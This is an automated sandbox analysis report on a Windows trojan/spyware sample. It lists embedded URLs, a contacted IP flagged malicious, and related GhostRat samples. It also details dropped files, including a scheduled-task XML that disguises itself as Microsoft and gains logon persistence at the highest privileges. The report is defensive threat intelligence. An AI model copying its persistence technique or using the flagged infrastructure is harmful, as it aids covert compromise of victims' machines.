                                                      http://bbs.360.cn/thread-15735708-1-1.htmlPA1http://www.360.cn/privacy/v3/360anquanweishi.htmlPAErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://down.360safe.com/setup.exePathSOFTWARE360inst_install.exe.0.drfalse
                                                        		high
                                                        https://hao.360.cn/?installerhttps://hao.360.cnhttps://http://https://hao.360.cn/%s360inst_install.exe.0.drfalse
                                                          		high
                                                          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                                            		high
                                                            http://pinst.360.cn/360haohua/safe_chaoqiang.cab?ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                                              		high
                                                              http://pinst.360.cn/360safe/h_inst.cabErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://sfdw.360safe.com/setupbeta.exe4(u7b4NErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://aka.ms/pscore6lBpowershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exeh360inst_install.exe.0.drfalse
                                                                  		high
                                                                  http://sfdw.360safe.com/safesetup_2000.exe360360inst_install.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://bbs.360.cn/thread-16079507-1-1.htmlD360inst_install.exe.0.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#ErbgterT2R.exe, 00000000.00000003.1809498693.0000000006FC0000.00000004.00001000.00020000.00000000.sdmp, ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EF2000.00000004.00000020.00020000.00000000.sdmp, Update.dll.0.drfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.2632273712.0000000004EA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000005144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004AD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000012.00000002.2634350577.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2643287383.00000000059E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://360.cn360inst_install.exe.0.drfalse
                                                                            		high
                                                                            http://www.360.cn/xukexieyi.html#360ErbgterT2R.exe, 00000000.00000003.1807301066.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, 360inst_install.exe.0.drfalse
                                                                              		high
                                                                              http://sfdw.360safe.com/superkiller/superkillerexe_880765522ded7527821ce7448af08018_5.1.64.1181.cabh360inst_install.exe.0.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://123.com/wdurlprocsi:19510029safeinstallsafeinstall.infoseinstallseinstall.infopop:360inst_install.exe.0.drfalse
                                                                                		high
                                                                                http://123.com/360inst_install.exe.0.drfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.2632273712.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2633221267.0000000004981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    134.122.155.39
                                                                                    		unknownUnited States
                                                                                    		64050BCPL-SGBGPNETGlobalASNSGtrue

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1584889
                                                                                    Start date and time:2025-01-06 17:46:36 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 51s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Run name:Run with higher sleep bypass
                                                                                    Number of analysed new started processes analysed:29
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:ErbgterT2R.exe
                                                                                    renamed because original name is a hash value
                                                                                    Original Sample Name:14DFEC5B51C4D87EACAB495AD216EB7C.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@43/29@0/1
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 50%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 98%
                                                                                    • Number of executed functions: 160
                                                                                    • Number of non-executed functions: 231
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7196 because it is empty
                                                                                    • Execution Graph export aborted for target powershell.exe, PID 7284 because it is empty
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • VT rate limit hit for: ErbgterT2R.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    No simulations

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    No context

                                                                                    Domains

                                                                                    No context

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    BCPL-SGBGPNETGlobalASNSGOrder Inquiry.exeGet hashmaliciousFormBookBrowse
                                                                                    • 134.122.135.48
                                                                                    Uulw5M1DfU.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 137.220.229.61
                                                                                    HGwpjJUqhW.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 118.107.44.219
                                                                                    vYeaC4s9zP.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 27.124.4.60
                                                                                    Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                    • 134.122.133.80
                                                                                    BrSgiTp1iH.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 134.122.135.95
                                                                                    http://smbc.usobd.comGet hashmaliciousUnknownBrowse
                                                                                    • 134.122.128.92
                                                                                    zhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                    • 118.107.44.219
                                                                                    017069451a4dbc523a1165a2f1bd361a762bb40856778.exeGet hashmaliciousUnknownBrowse
                                                                                    • 27.124.34.140
                                                                                    Lets-x64.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                    • 202.79.169.178

                                                                                    JA3 Fingerprints

                                                                                    No context

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\Public\Bilite\360inst_install.exezhuzhu.exeGet hashmaliciousGhostRat, XRedBrowse
                                                                                      QQyisSetups64.exeGet hashmaliciousGhostRatBrowse
                                                                                        wyySetups64.exeGet hashmaliciousGhostRatBrowse

                                                                                          Created / dropped Files

                                                                                          C:\Users\Public\Bilite\360inst_install.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4118496
                                                                                          Entropy (8bit):7.743814085153487
                                                                                          Encrypted:false
                                                                                          SSDEEP:98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
                                                                                          MD5:AAA0F14BDFE3777EEE342C27DE409E6D
                                                                                          SHA1:6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
                                                                                          SHA-256:B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
                                                                                          SHA-512:D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 17%
                                                                                          Joe Sandbox View:
                                                                                          • Filename: zhuzhu.exe, Detection: malicious, Browse
                                                                                          • Filename: QQyisSetups64.exe, Detection: malicious, Browse
                                                                                          • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\Public\Bilite\Axialis\IiViS

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:openssl enc'd data with salted password, base64 encoded
                                                                                          Category:dropped
                                                                                          Size (bytes):56
                                                                                          Entropy (8bit):5.17325179698034
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:iqknyJzrlKTDbzWkxckiSYuwRY:iln4rYTKX9/+
                                                                                          MD5:422CD802223A0F760D7022721045A8B2
                                                                                          SHA1:5EE147059F4073C6B0F2D97CDAD589C365A10A09
                                                                                          SHA-256:8CDE4BB9ACBD3F479A512CF684113154E93207BC26D854BC0C0F783DDCA02D8A
                                                                                          SHA-512:AD4660E42CB80872F9E73CB21485BBD12DBF54FB09F46206F52F4A64C272B7A2760BC266E5E48151C485A570A5C614FBE23B00433BBC1975EB7FAF32BA45B3B0
                                                                                          Malicious:false
                                                                                          Preview:U2FsdGVkX1+8QmjlVo0alN7lDvfi26gFV1w3WRquYG9AG7aTsLBVUA==

                                                                                          C:\Users\Public\Bilite\Axialis\Update.dll

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):340760
                                                                                          Entropy (8bit):6.543041508104496
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:H66LUtNhlhaEDW8zn0iuAhzRgd5KrS8a1GJAlExz30/hUaCcM:H66LUtNrIAzCKzRgDKrSeGUalM
                                                                                          MD5:AC123A633FFD650E1C52DDEA5877D613
                                                                                          SHA1:D42AE3682768449EFFBAB0A2A80E074B31AC31EE
                                                                                          SHA-256:9FD0498B154F81BB9D25AF45CD6B73D01AE2570ADE3E273BCEFCC54FED4D4ECC
                                                                                          SHA-512:190BD111586DE3D276500116EF021CD19DBC1BC64124183041D258833D61329770E2FDFB83EF923FF28BE6C62A95A7A5B28A0B33564588DDED0D77B09F1BAB4E
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 48%
                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....mg...........!.........L......Y........................................p............@..........................t..O....t..........p6...............)...@...&...r.......................4.......................w...............................text............................... ..`.rdata..............................@..@.data....!..........................@....00cfg..............................@..@.tls................................@....rsrc...p6.......8..................@..@.reloc...&...@...(..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\Public\Bilite\Axialis\Update.exe

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):395368
                                                                                          Entropy (8bit):5.090673225697451
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:I0acLF3rgypB1Grf/TRfiJ7BePaEvLJggZy:Y/TRfi3ePtJRg
                                                                                          MD5:FB325C945A08D06FE91681179BDCCC66
                                                                                          SHA1:F5D91B7D75D34E156066AB4099E0FD0DF9227B32
                                                                                          SHA-256:0C2CC4513EC9101A28A7988C72A46175EFD82F387BB3BCFB2612E808804282B5
                                                                                          SHA-512:2BB588EBE2FA35D03652AEC4E5D51DABD3A24E996336A4D5EC9C762D6084862D5CD5F530F1DA0B98D2887BA88F4E077697D128071FF497D2967F9F42ADC2F533
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[...[...[...#l..[.......[.......[.......[.......[..b....[..e....[...0...[...[...[..e....[..e....[...[h..[..e....[..Rich.[..........................PE..L...X..e............................\........ ....@..................................8....@.................................D(.......@..................h(...........!..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0.......$..............@....rsrc........@.......&..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                          C:\Users\Public\Bilite\Axialis\ndtidaod.png

                                                                                          Download File
                                                                                          Process:C:\Users\user\Desktop\ErbgterT2R.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):68873026
                                                                                          Entropy (8bit):7.9999953924006855
                                                                                          Encrypted:true
                                                                                          SSDEEP:1572864:nfqHL70Cjtyh6S0eSlQwvyzXek+NMsUuXWj5XL7tG:nfcjr9+XuNMkw1G
                                                                                          MD5:D6853731E319DC6237C59AD48E14CF89
                                                                                          SHA1:0FDB5B7B5B3314DDC3823E0C1D3C6D675EE5AC61
                                                                                          SHA-256:457C70B59C8F0667870CEE730AB8DCCD592BEC06E3864E7FB715BFD51987F87B
                                                                                          SHA-512:1FA3591D91B7A287EC667AEC8EA844643E8E4D5D9B8B55884E6C52AD26366B347F607EFAA2E18FB97C23FEEBAF7724D6443B593F3AAA0EEED38469A7FDB15216
                                                                                          Malicious:false
                                                                                          Preview:..>..9..x...@..[(.....r......!2q......4..@[..x.&2.f.C..........k..._..^rS.c...r}.<r&..I?..}zz.y.....=..=...pd.W.x..woB.6I.8%h..l..,.d........3.C.P.Ls.{...3..e..1.._..@.+..iRQ...C.'......0.U.eOf....p...~.T..:A..g/.......k....Ty..,..[..?.fi......B.~(..L./iV.../G/...C..#..hQ.!...N....vbh...`.h{......9....V.O..%...V...."....J$7k.Z.J.&Os1...?B.&GU.'.^c.X..}....lF.z.|zr.G....H...a..$N.. ..."........&c.\..2...\.N..X.|K.oY..u...I%.B.f"..wJ..#.7....(..|...r....pB...\.....].3.Y..3..==..L....l.@.6..G..8A"..../.....g...w...q9;..)]..|..h.../..$..5....io.....b40Q1;.......M.L.S.$I..]..M.l.|+.../>.*.j..M'.7u\..zYzn........n{..W.........E....M4.u...6...?5.k.'3.s./E...~V...J;....O...s...)w.\.B.....^.H.O..B.b......T.g..\..F6.....3.tT.B...f-..N..h-...l..W:..b..@[.cX#uF:..n......J%.M...V.Z....?...,....@.f..BIG<...<.N#.!u....{h|...B.......h.cD...;>..c..}...N.B....'iU.d&....x.36.W%I.....`w.e.Q'gz......+.Gn..!U+..m".K. X]9...N0<....c.=.2..../z)m)C/|.4M1...(...

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1360
                                                                                          Entropy (8bit):5.408860214304474
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:3LWSKco4KmZjKMs4RP7mC6moUebIKo+mZ9tXt/NK3R88bJ02raW3b1:7WSU4xc4RTmaoUeW+mZ9tlNWR832Oab1
                                                                                          MD5:2CA946F1B91B258AC9EFD0CB704FA345
                                                                                          SHA1:5CABCEB9B1E9B23E046E5A822FD7F05697F51440
                                                                                          SHA-256:17CB7C204E364EC75FA674FF18D618C3CC9BFD7F8175A394C092CD1F52B190D6
                                                                                          SHA-512:51D2917078B792EF20AAB794128443E35813AFE13A7A2891021890132BA5F7E46664FEC36804439E78340009C3B9D7203299BCCEDCE15D24B606F3C367B54C67
                                                                                          Malicious:false
                                                                                          Preview:@...e...........................................................P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                                          C:\Users\user\AppData\Local\PolicyManagement.xml

                                                                                          Download File
                                                                                          Process:C:\Users\Public\Bilite\Axialis\Update.exe
                                                                                          File Type:XML 1.0 document, ASCII text
                                                                                          Category:dropped
                                                                                          Size (bytes):1893
                                                                                          Entropy (8bit):5.212287775015203
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
                                                                                          MD5:E3FB2ECD2AD10C30913339D97E0E9042
                                                                                          SHA1:A004CE2B3D398312B80E2955E76BDA69EF9B7203
                                                                                          SHA-256:1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
                                                                                          SHA-512:9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
                                                                                          Malicious:false
                                                                                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wo1lbz4.k24.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_budxu4xk.4sn.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhbhpiti.g3t.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gal4wttm.px4.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxu4ax4k.ddr.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uuwm5afa.gaz.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uxkoeulu.wtu.psm1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzi4g24s.fwj.ps1

                                                                                          Download File
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):60
                                                                                          Entropy (8bit):4.038920595031593
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                          Malicious:false
